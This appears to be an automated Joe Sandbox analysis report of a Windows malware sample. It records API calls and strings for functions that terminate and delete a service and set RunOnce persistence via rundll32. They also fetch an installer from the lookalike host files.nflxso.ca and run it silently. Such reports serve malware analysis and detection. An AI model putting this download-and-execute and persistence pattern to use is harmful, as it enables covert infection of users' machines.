                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                              • Opcode ID: dda4c30aac04319d6173a8c9764fc9581e8975240c3cdf388c111e25aec18b60
                                                                                                                                                                                                              • Instruction ID: 1ffd10b1539cdb91c931fefc26c0b2ec641e12223bc97f6bc35920891a31803b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: dda4c30aac04319d6173a8c9764fc9581e8975240c3cdf388c111e25aec18b60
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 16E04FB148D5E0BA86026F18BEC185A7BB5EF4871030018A7F5000B331EF3246939E84
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BD083C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: C:\Users\user\Desktop\Replace.exe
                                                                                                                                                                                                              • API String ID: 0-2253954093
                                                                                                                                                                                                              • Opcode ID: 46aa90ab370cff26dcf584201a7f8dd8160c3082742fc77ed68c89305273feda
                                                                                                                                                                                                              • Instruction ID: bc595db9276cba50870ad01fa2e3c2349eeac688334371df4d894d8954e9036e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 46aa90ab370cff26dcf584201a7f8dd8160c3082742fc77ed68c89305273feda
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5C417F71A14255AFDB11EB9D9C91AAEFBF8EB84710F1000A7E50497312FB758E40DB90
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BCF5C5 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00BCF5EA
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: EncodePointer
                                                                                                                                                                                                              • String ID: MOC$RCC
                                                                                                                                                                                                              • API String ID: 2118026453-2084237596
                                                                                                                                                                                                              • Opcode ID: 5b9cf06caf7ac281f46df28f38fc3e9de252c1863fc78073b2cf3f71c5183b5e
                                                                                                                                                                                                              • Instruction ID: 8ee57d0b13e35e47f801d7b80e0d24eb222d0b44202a6e5d2ce2c1e26077e67f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5b9cf06caf7ac281f46df28f38fc3e9de252c1863fc78073b2cf3f71c5183b5e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9B41157290020AAFCF15DF98C981FAEBBB6FF48304F1480E9F915A6265E7359A50DB50
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BB7FFE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __aulldiv
                                                                                                                                                                                                              • String ID: 3333
                                                                                                                                                                                                              • API String ID: 3732870572-2924271548
                                                                                                                                                                                                              • Opcode ID: 3b13e274155ec2addd8fb08deaf8594177a17d8cba0e21c3aec01a85280517bd
                                                                                                                                                                                                              • Instruction ID: 6f4be52c4ec8eedd79eb3e9324a007cf6da84f1d4688be6f8bd72630b566c946
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3b13e274155ec2addd8fb08deaf8594177a17d8cba0e21c3aec01a85280517bd
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 17F096323002187BDB24695DCC46BEEBBDDCB847F1F48C026B7099D2D0D5B14804CA99
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                              Execution Coverage:79.3%
                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                              Signature Coverage:25.9%
                                                                                                                                                                                                              Total number of Nodes:85
                                                                                                                                                                                                              Total number of Limit Nodes:2
                                                                                                                                                                                                              execution_graph 108 6e2b1670 109 6e2b16e8 108->109 110 6e2b1682 strstr 108->110 135 6e2b124b GetModuleFileNameW 109->135 112 6e2b16aa strstr 110->112 113 6e2b1696 mbstowcs 110->113 112->109 115 6e2b16ba strchr 112->115 113->112 117 6e2b16cc 115->117 118 6e2b16d0 strlen 115->118 119 6e2b16d8 mbstowcs 117->119 118->119 119->109 125 6e2b116d 3 API calls 126 6e2b174d wcscat 125->126 168 6e2b11a6 CreateFileW 126->168 129 6e2b17d0 Sleep 176 6e2b13b4 129->176 132 6e2b17e4 204 6e2b136b RegOpenKeyExW 132->204 136 6e2b1277 RegCreateKeyExW 135->136 137 6e2b1366 135->137 136->137 138 6e2b129d wcscpy wcscat wcscat 136->138 143 6e2b1000 OpenSCManagerW 137->143 139 6e2b12ff 138->139 140 6e2b12e0 wcscat wcscat 138->140 141 6e2b1308 wcscat wcscat 139->141 142 6e2b1327 wcslen RegSetValueExW RegCloseKey 139->142 140->139 141->142 142->137 144 6e2b101f OpenServiceW 143->144 145 6e2b10a4 143->145 146 6e2b109c CloseServiceHandle 144->146 147 6e2b1037 ControlService 144->147 154 6e2b10ac CreateToolhelp32Snapshot 145->154 146->145 148 6e2b104b GetLastError 147->148 149 6e2b1086 DeleteService CloseServiceHandle 147->149 148->149 150 6e2b1058 148->150 149->146 151 6e2b1075 QueryServiceStatus 150->151 152 6e2b1085 150->152 153 6e2b106a Sleep 150->153 151->150 151->152 152->149 153->151 155 6e2b10cd memset Process32FirstW 154->155 156 6e2b1167 154->156 157 6e2b115f FindCloseChangeNotification 155->157 158 6e2b10fd 155->158 165 6e2b116d SHGetKnownFolderPath 156->165 157->156 159 6e2b1100 _wcsicmp 158->159 160 6e2b1118 OpenProcess 159->160 161 6e2b1147 Process32NextW 159->161 162 6e2b112c TerminateProcess CloseHandle 160->162 163 6e2b1144 160->163 161->159 164 6e2b1159 GetLastError 161->164 162->163 163->161 164->157 166 6e2b11a1 wcscat wcscpy wcscat 165->166 167 6e2b1187 wcscpy CoTaskMemFree 165->167 166->125 167->166 169 6e2b11cc GetFileSize 168->169 170 6e2b1245 6 API calls 168->170 171 6e2b123d CloseHandle 169->171 172 6e2b11dc malloc ReadFile 169->172 170->129 171->170 173 6e2b11f6 CloseHandle CreateFileW 172->173 174 6e2b1234 free 172->174 173->174 175 6e2b121d WriteFile 173->175 174->171 175->174 207 6e2b1810 176->207 179 6e2b13df WinHttpConnect 181 6e2b165d WinHttpCloseHandle 179->181 182 6e2b13fc WinHttpOpenRequest 179->182 180 6e2b1665 180->129 180->132 181->180 183 6e2b1430 WinHttpSendRequest 182->183 184 6e2b1655 WinHttpCloseHandle 182->184 185 6e2b164e WinHttpCloseHandle 183->185 186 6e2b1445 WinHttpReceiveResponse 183->186 184->181 185->184 186->185 187 6e2b1455 GetTempPathW 186->187 187->185 188 6e2b1470 GetTempFileNameW 187->188 188->185 189 6e2b1494 CreateFileW 188->189 189->185 190 6e2b14be WinHttpQueryDataAvailable 189->190 191 6e2b154e CloseHandle 190->191 192 6e2b14e0 190->192 193 6e2b155f wcscpy 191->193 194 6e2b1646 191->194 195 6e2b14e5 WinHttpReadData 192->195 196 6e2b1583 wcscat wcscat 193->196 197 6e2b15a4 193->197 194->185 198 6e2b1549 195->198 199 6e2b1507 WriteFile 195->199 196->197 200 6e2b15ce memset memset CreateProcessW 197->200 201 6e2b15ad wcscat wcscat 197->201 198->191 199->198 202 6e2b1524 Sleep WinHttpQueryDataAvailable 199->202 200->194 203 6e2b161d WaitForSingleObject CloseHandle CloseHandle DeleteFileW 200->203 201->200 202->195 202->198 203->194 205 6e2b13af ExitProcess 204->205 206 6e2b1390 RegDeleteValueW RegCloseKey 204->206 206->205 208 6e2b13be WinHttpOpen 207->208 208->179 208->180

                                                                                                                                                                                                              Callgraph

                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                              Function 6E2B1000 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 64servicesleepCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000005,?,?,?,?,?,?,6E2B16F2), ref: 6E2B100F
                                                                                                                                                                                                              • OpenServiceW.ADVAPI32(00000000,windowsnetservicehelper.exe,00010024,?,?,?,?,?,?,6E2B16F2), ref: 6E2B102B
                                                                                                                                                                                                              • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,6E2B16F2), ref: 6E2B1041
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,6E2B16F2), ref: 6E2B104B
                                                                                                                                                                                                              • Sleep.KERNEL32(000001F4), ref: 6E2B106F
                                                                                                                                                                                                              • QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,?,?,6E2B16F2), ref: 6E2B107B
                                                                                                                                                                                                              • DeleteService.ADVAPI32(00000000,?,?,?,?,?,?,6E2B16F2), ref: 6E2B1087
                                                                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,6E2B16F2), ref: 6E2B1096
                                                                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,6E2B16F2), ref: 6E2B109D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2143507846.000000006E2B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6E2B0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2143479302.000000006E2B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2143530843.000000006E2B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2143553178.000000006E2B4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6e2b0000_rundll32.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Service$CloseHandleOpen$ControlDeleteErrorLastManagerQuerySleepStatus
                                                                                                                                                                                                              • String ID: 2$ServicesActive$windowsnetservicehelper.exe
                                                                                                                                                                                                              • API String ID: 2697554486-1059962515
                                                                                                                                                                                                              • Opcode ID: 3050b5cd6083a3ccf45fb35937120563a16bc8976abfe8782140561c3c408ad8
                                                                                                                                                                                                              • Instruction ID: 846e2c65aef1c447b3ddf6d2c98dafca165e4896c1a1f211b3c8e120e285b75a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3050b5cd6083a3ccf45fb35937120563a16bc8976abfe8782140561c3c408ad8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D111C277E44B4A6BE6115AE48C4CA7B36AEEF5679EB000C24FE11C2100E6F48489C771
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 6E2B10AC Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 70processCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 6E2B10BC
                                                                                                                                                                                                              • memset.MSVCRT ref: 6E2B10DC
                                                                                                                                                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 6E2B10F3
                                                                                                                                                                                                              • _wcsicmp.MSVCRT ref: 6E2B110C
                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 6E2B1120
                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,00000009), ref: 6E2B112F
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 6E2B113E
                                                                                                                                                                                                              • Process32NextW.KERNEL32(00000000,?), ref: 6E2B114F
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6E2B1159
                                                                                                                                                                                                              • FindCloseChangeNotification.KERNEL32(00000000), ref: 6E2B1160
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • windowsnetservicehelper.exe, xrefs: 6E2B1106
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2143507846.000000006E2B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6E2B0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2143479302.000000006E2B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2143530843.000000006E2B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2143553178.000000006E2B4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6e2b0000_rundll32.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseProcessProcess32$ChangeCreateErrorFindFirstHandleLastNextNotificationOpenSnapshotTerminateToolhelp32_wcsicmpmemset
                                                                                                                                                                                                              • String ID: windowsnetservicehelper.exe
                                                                                                                                                                                                              • API String ID: 4188211969-237555702
                                                                                                                                                                                                              • Opcode ID: 15f1d4da425901a746c2dd868e109e218afcc4091fc53ceeaef81e23db5792c3
                                                                                                                                                                                                              • Instruction ID: e509655257f2ed59784c7ce2552a95d15223d1ed8bcb121b16b9fb0f61cb6254
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 15f1d4da425901a746c2dd868e109e218afcc4091fc53ceeaef81e23db5792c3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 941186B3A007156BDB101BF59C8CF9B36AEEF4A25AF040565F916D2141E6B08949CB70
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 6E2B13B4 Relevance: 68.5, APIs: 29, Strings: 10, Instructions: 221filesleepprocessCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WinHttpOpen.WINHTTP(Mozilla/5.0 (Windows) WinHTTP/Gecko Chrome/9999999,00000000,00000000,00000000,00000000,00000000,?,6E2B17E0), ref: 6E2B13CB
                                                                                                                                                                                                              • WinHttpConnect.WINHTTP(00000000,files.nflxso.ca,00000000,00000000,00000000,?,6E2B17E0), ref: 6E2B13E8
                                                                                                                                                                                                              • WinHttpOpenRequest.WINHTTP(00000000,GET,/downloads/winapp/latest-installer.exe,00000000,00000000,?), ref: 6E2B1420
                                                                                                                                                                                                              • WinHttpSendRequest.WINHTTP(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6E2B1437
                                                                                                                                                                                                              • WinHttpReceiveResponse.WINHTTP(00000000,00000000), ref: 6E2B1447
                                                                                                                                                                                                              • GetTempPathW.KERNEL32(00000104,?), ref: 6E2B1462
                                                                                                                                                                                                              • GetTempFileNameW.KERNEL32(?,wnshd,00000000,?), ref: 6E2B1486
                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 6E2B14AB
                                                                                                                                                                                                              • WinHttpQueryDataAvailable.WINHTTP(00000000,?), ref: 6E2B14CE
                                                                                                                                                                                                              • WinHttpReadData.WINHTTP(00000000,?,?,?), ref: 6E2B14FD
                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 6E2B151A
                                                                                                                                                                                                              • Sleep.KERNEL32(0000000A), ref: 6E2B1526
                                                                                                                                                                                                              • WinHttpQueryDataAvailable.WINHTTP(00000000,?), ref: 6E2B1536
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 6E2B1555
                                                                                                                                                                                                              • wcscpy.MSVCRT ref: 6E2B156C
                                                                                                                                                                                                              • wcscat.MSVCRT ref: 6E2B1590
                                                                                                                                                                                                              • wcscat.MSVCRT ref: 6E2B159F
                                                                                                                                                                                                              • wcscat.MSVCRT ref: 6E2B15BA
                                                                                                                                                                                                              • wcscat.MSVCRT ref: 6E2B15C9
                                                                                                                                                                                                              • memset.MSVCRT ref: 6E2B15DC
                                                                                                                                                                                                              • memset.MSVCRT ref: 6E2B15EE
                                                                                                                                                                                                              • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00800000), ref: 6E2B1613
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00800000,?,?,6E2B17E0), ref: 6E2B1623
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00800000,?,?,6E2B17E0), ref: 6E2B162D
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00800000,?,?,6E2B17E0), ref: 6E2B1633
                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,?,00800000,?,?,6E2B17E0), ref: 6E2B163D
                                                                                                                                                                                                              • WinHttpCloseHandle.WINHTTP(00000000), ref: 6E2B164F
                                                                                                                                                                                                              • WinHttpCloseHandle.WINHTTP(00000000), ref: 6E2B1656
                                                                                                                                                                                                              • WinHttpCloseHandle.WINHTTP(00000000,?,6E2B17E0), ref: 6E2B165E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2143507846.000000006E2B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6E2B0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2143479302.000000006E2B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2143530843.000000006E2B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2143553178.000000006E2B4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6e2b0000_rundll32.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Http$CloseHandle$Filewcscat$Data$AvailableCreateOpenQueryRequestTempmemset$ConnectDeleteNameObjectPathProcessReadReceiveResponseSendSingleSleepWaitWritewcscpy
                                                                                                                                                                                                              • String ID: /STATUSDAT=$ /VERPOSTFIX=$*/*$/downloads/winapp/latest-installer.exe$D$GET$Mozilla/5.0 (Windows) WinHTTP/Gecko Chrome/9999999$files.nflxso.ca$wnshd$wscsu.exe /S
                                                                                                                                                                                                              • API String ID: 34256906-2308794090
                                                                                                                                                                                                              • Opcode ID: 4c52dade6601d40958041cb7513b85b142009a769407bf804102b40be44dec95
                                                                                                                                                                                                              • Instruction ID: 9d440a6ae5e48aad6d072df48017d6c038c3546c04cb7367d416f599f89fdef3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4c52dade6601d40958041cb7513b85b142009a769407bf804102b40be44dec95
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EE618EB290434AAFDB208FA18C4CE9B7BAEEF96748F044D19BA55D3140DB70D548CB72
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 6E2B1670 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 117stringsleepCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2143507846.000000006E2B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6E2B0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2143479302.000000006E2B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2143530843.000000006E2B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2143553178.000000006E2B4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6e2b0000_rundll32.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: wcscat$mbstowcsstrstr$ExitFileOperationProcessSleepcallocfreememcpymemsetstrchrstrlenwcscpywcslen
                                                                                                                                                                                                              • String ID: \Microsoft\Windows\InetHelper.status$\WindowsNetService$\status.dat$statusdat=$verpostfix=
                                                                                                                                                                                                              • API String ID: 213091988-3107139697
                                                                                                                                                                                                              • Opcode ID: 48c07b4dc05c950904db3cd48a96635f2074178589f5463a5753cfe9d8f77e3f
                                                                                                                                                                                                              • Instruction ID: 5392656ee301a0b591adb3bf5cc06b80db6f191c3f1b71b5896e20a38430d03f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 48c07b4dc05c950904db3cd48a96635f2074178589f5463a5753cfe9d8f77e3f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3E418FB3C0171DABDB10ABE0DC0CADE776EEF15299F040955E905A7140EBB49A88CBB5
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 6E2B124B Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 87registryCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(?,00000104,?), ref: 6E2B1269
                                                                                                                                                                                                              • RegCreateKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 6E2B128F
                                                                                                                                                                                                              • wcscpy.MSVCRT ref: 6E2B12AA
                                                                                                                                                                                                              • wcscat.MSVCRT ref: 6E2B12C4
                                                                                                                                                                                                              • wcscat.MSVCRT ref: 6E2B12D2
                                                                                                                                                                                                              • wcscat.MSVCRT ref: 6E2B12EC
                                                                                                                                                                                                              • wcscat.MSVCRT ref: 6E2B12FA
                                                                                                                                                                                                              • wcscat.MSVCRT ref: 6E2B1314
                                                                                                                                                                                                              • wcscat.MSVCRT ref: 6E2B1322
                                                                                                                                                                                                              • wcslen.MSVCRT ref: 6E2B132E
                                                                                                                                                                                                              • RegSetValueExW.KERNEL32(?,cleaninethelper,00000000,00000001,?,00000000), ref: 6E2B1351
                                                                                                                                                                                                              • RegCloseKey.KERNEL32(?), ref: 6E2B135F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2143507846.000000006E2B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6E2B0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2143479302.000000006E2B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2143530843.000000006E2B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2143553178.000000006E2B4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6e2b0000_rundll32.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: wcscat$CloseCreateFileModuleNameValuewcscpywcslen
                                                                                                                                                                                                              • String ID: statusdat=$ verpostfix=$",Start$Software\Microsoft\Windows\CurrentVersion\RunOnce$cleaninethelper$rundll32 "
                                                                                                                                                                                                              • API String ID: 411374443-3287171265
                                                                                                                                                                                                              • Opcode ID: 199666a5296ffb6bee18e4474c69ef9014b24be764a6f650e258453f96ff6739
                                                                                                                                                                                                              • Instruction ID: cc46abe5e76747173ffaee154e84072ebed0e48ee8437a4e908e6f6ca91dfa36
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 199666a5296ffb6bee18e4474c69ef9014b24be764a6f650e258453f96ff6739
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9321FCF3D0061DABDF20AAA48D4CEDE767EEF85398F0545A1F609E3101E6709684CBB5
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 6E2B11A6 Relevance: 13.6, APIs: 9, Instructions: 72fileCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,759BA130,?,6E2B176C), ref: 6E2B11BF
                                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,759BA130,?,6E2B176C), ref: 6E2B11CF
                                                                                                                                                                                                              • malloc.MSVCRT ref: 6E2B11DE
                                                                                                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,759BA130,?,6E2B176C), ref: 6E2B11EC
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,759BA130,?,6E2B176C), ref: 6E2B11F7
                                                                                                                                                                                                              • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000080,00000000,?,?,759BA130,?,6E2B176C), ref: 6E2B1210
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000000,759BA130,00000000,?,?,759BA130,?,6E2B176C), ref: 6E2B1226
